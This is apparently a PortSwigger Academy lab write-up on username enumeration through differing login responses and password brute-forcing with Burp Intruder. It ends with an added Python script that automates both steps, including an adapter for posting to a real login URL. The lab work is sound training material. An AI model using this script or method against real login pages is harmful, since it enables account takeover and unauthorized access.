Lab: Username enumeration via different responses

Vulnerabilities in password-based login — PortSwigger Academy

Yikai
3 min readOct 21, 2020

When the lab starts, open the login page and submit any username and password to see how a failed login is handled. In this case, I entered Username: user and Password: password.

Next, route the browser through Burp Suite's proxy and intercept the POST request that the login form sends. Send this request to Intruder, which is where we prepare the attack.

In the Positions tab, set the attack type to Sniper, which substitutes payloads into a single position. Click the Clear button on the right to remove the positions Burp marks by default, then highlight the value of the parameter we want to attack, which in this case is the username, and click Add to mark it as the payload position.

Next, under Intruder go to the Payloads tab and, in the payload options, click Load to select the username list (for this lab the candidate username and password lists are provided).

Once that is done, go back to the Positions tab and click Start attack.

Once the attack is done, sort the results by status code or response length. One username, "ao", returns a status of 302 while every other request returns 200. A response that differs from the rest means the application handles that username differently, so it is a likely valid account. Note that a 302 redirect means the login actually succeeded: the password we submitted in the first request happened to be the correct one for this account. In general the difference to look for is in the error message and response length, since a valid username produces "Incorrect password" rather than "Invalid username".

Let’s return to the login page and try to login in with ao:<somePassword>.

Here we see that instead of the "Invalid username" error, the notification is now "Incorrect password". This confirms the username is valid, so we can focus the brute-force attack on the password parameter alone.

Let's again intercept the POST request from the login page and send it to Intruder in Sniper mode.

This time the parameter we want to attack is the password, so set the username to ao and mark the password value as the only payload position.

As before, load the payload list, but this time use the password list. Once it is loaded, start the attack.

Here one password returns a status of 302 (a redirect to the account page) while every other guess returns 200 with "Incorrect password". That 302 response identifies the password for the user ao.

Using the credential [ao:password] we are able to successfully log in and go to the “My account” page to solve this lab.

Do take note that the valid username and password change for every new lab session, so the values above will differ for you.
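The same two steps, scripted, as an added example that is not part of the original post or of the PortSwigger lab materials. It abstracts the login as a function returning status and body, groups responses by their signature (status code, body length, body text, the fields you sort on in Intruder) and reports the usernames whose response differs from the majority, then brute-forces the password for a confirmed username by looking for the 302. The fake_login stand-in, its account ao:password and the wordlists are constructed for the demo; the http_login_factory helper and its form field names username and password are assumptions about the lab's form and are not exercised here.

```python
from collections import Counter
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class Response:
    status: int
    body: str

    def signature(self) -> Tuple[int, int, str]:
        # Status, length and text: the same columns Intruder lets you sort on.
        return (self.status, len(self.body), self.body)


LoginFn = Callable[[str, str], Response]

# Constructed stand-in for the lab's login endpoint (the real account differs per session).
FAKE_ACCOUNTS = {"ao": "password"}


def fake_login(username: str, password: str) -> Response:
    if username not in FAKE_ACCOUNTS:
        return Response(200, "Invalid username")
    if FAKE_ACCOUNTS[username] != password:
        return Response(200, "Incorrect password")
    return Response(302, "")  # redirect to the "My account" page


def enumerate_usernames(login: LoginFn, usernames: Iterable[str],
                        probe_password: str = "definitely-wrong-xyz") -> List[str]:
    """Return usernames whose response differs from the most common one.

    Any deviation counts: "Incorrect password" instead of "Invalid username",
    a different length, or a 302 because the probe password happened to be right.
    """
    results = {u: login(u, probe_password) for u in usernames}
    counts = Counter(r.signature() for r in results.values())
    if len(counts) < 2:
        return []  # every response identical: nothing to enumerate on
    baseline = counts.most_common(1)[0][0]
    return [u for u, r in results.items() if r.signature() != baseline]


def brute_force_password(login: LoginFn, username: str,
                         passwords: Iterable[str]) -> Optional[str]:
    """Return the first password that yields a redirect (302), or None."""
    for candidate in passwords:
        if login(username, candidate).status == 302:
            return candidate
    return None


def http_login_factory(url: str) -> LoginFn:
    """Assumed real-target adapter: POST username/password, do not follow the 302."""
    import urllib.error
    import urllib.parse
    import urllib.request

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surface the 302 instead of following it

    opener = urllib.request.build_opener(NoRedirect)

    def login(username: str, password: str) -> Response:
        data = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        try:
            with opener.open(url, data=data, timeout=10) as resp:
                return Response(resp.status, resp.read().decode(errors="replace"))
        except urllib.error.HTTPError as err:  # 302 and 4xx/5xx land here
            return Response(err.code, err.read().decode(errors="replace"))

    return login


if __name__ == "__main__":
    users = ["admin", "carlos", "ao", "guest"]          # constructed wordlist
    pwds = ["123456", "letmein", "qwerty", "password"]  # constructed wordlist
    found = enumerate_usernames(fake_login, users)
    print("candidate usernames:", found)
    for u in found:
        print(u, "->", brute_force_password(fake_login, u, pwds))
```

Against the real lab you would replace fake_login with http_login_factory("https://<lab-id>.web-security-academy.net/login") and pass the lab's wordlists; the signature comparison is what makes the enumeration work whether the tell is the message text, the length or the status code.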
